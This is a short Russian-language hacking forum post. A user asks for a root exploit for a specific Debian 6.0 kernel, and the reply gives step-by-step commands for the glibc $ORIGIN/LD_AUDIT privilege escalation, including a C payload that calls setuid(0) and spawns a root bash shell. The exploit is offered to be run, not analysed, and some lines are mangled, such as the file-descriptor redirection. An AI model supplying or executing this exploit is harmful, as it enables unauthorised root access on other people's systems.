
20.07.2011, 17:58
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 5
С нами:
8738852
Репутация:
0
|
|
Сообщение от C-r-A-c-K
будьте так любезны, подберите сплоит под
OS version: Linux version 2.6.32-3-amd64 (Debian 2.6.32-9) (maks@debian.org) (gcc version 4.3.4 (Debian 4.3.4-8) ) #1 SMP Wed Feb 24 18:07:42 UTC 2010
Distr name: Debian GNU/Linux 6.0
пробовал _1337day.com/exploits/14601
но не разобрался как с ним работать
пробовал r00t.sh (не запустился)
пробовал через libpcprofile.so нет прав на запись..
Судя по вашему сообщению через libpcprofile.so вы пробовали сделать выполнение крон...но данный дистрибутив должен пробиваться стандартным способом баги Glib...
вот перечень команд:
Код:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3 payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
|
|
|